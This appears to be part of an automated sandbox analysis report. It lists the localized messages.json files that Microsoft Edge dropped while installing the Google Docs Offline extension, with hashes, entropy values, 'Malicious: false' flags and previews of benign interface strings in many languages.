SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
